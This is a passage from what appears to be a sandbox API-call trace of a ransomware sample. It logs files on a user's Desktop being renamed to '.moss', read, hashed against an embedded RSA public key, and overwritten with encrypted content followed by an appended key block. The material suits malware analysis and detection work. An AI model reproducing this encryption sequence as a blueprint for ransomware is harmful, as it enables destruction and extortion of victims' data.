(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ndaW7cmNb.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ndaw7cmnb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ndaW7cmNb.gif.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ndaw7cmnb.gif.moss")) returned 1 [0169.362] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.362] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.362] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.363] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.363] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18911b30, ftCreationTime.dwHighDateTime=0x1d5e715, ftLastAccessTime.dwLowDateTime=0xaeb6d920, ftLastAccessTime.dwHighDateTime=0x1d5d8fa, ftLastWriteTime.dwLowDateTime=0xaeb6d920, ftLastWriteTime.dwHighDateTime=0x1d5d8fa, nFileSizeHigh=0x0, nFileSizeLow=0x186e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nH5qXP_95YPmxX.mkv", cAlternateFileName="NH5QXP~1.MKV")) returned 1 [0169.363] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.363] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.363] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.363] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nH5qXP_95YPmxX.mkv") returned=".mkv" [0169.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nH5qXP_95YPmxX.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nh5qxp_95ypmxx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.364] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=100067) returned 1 [0169.364] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.367] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x186bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.367] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.369] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.369] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.369] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.369] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x186e3, lpOverlapped=0x0) returned 1 [0169.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.370] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.370] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.371] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.371] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.371] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.371] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.371] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.371] GetLastError () returned 0x0 [0169.372] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.372] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.372] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.372] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.372] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.372] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.372] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x186e0) returned 0x3b62d40 [0169.373] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45470 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbde0 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b454b8 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdf8 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe28 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe40 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.373] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b7b428 [0169.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.373] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b7b428 | out: hHeap=0xcd0000) returned 1 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe40 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.373] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbe28 [0169.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.374] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.377] GetCurrentThreadId () returned 0x324 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32090 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.377] GetCurrentThreadId () returned 0x324 [0169.377] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.377] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe28 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0169.378] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.378] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe40 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe10 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe58 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbb70 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe28 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.379] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.379] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b7b428 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.380] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f0b8 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b7b428 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe58 | out: hHeap=0xcd0000) returned 1 [0169.380] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe10 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdf8 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b454b8 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.381] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.381] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x186de, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x186de, lpOverlapped=0x0) returned 1 [0169.382] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.382] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x186e3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.382] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, 